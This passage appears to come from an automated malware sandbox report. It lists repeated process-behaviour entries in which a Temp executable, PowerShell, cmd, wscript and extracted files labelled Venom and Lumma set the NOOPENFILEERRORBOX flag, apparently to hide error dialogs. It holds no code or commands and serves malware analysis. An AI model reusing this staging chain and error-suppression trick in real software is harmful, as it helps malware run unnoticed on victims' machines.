Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
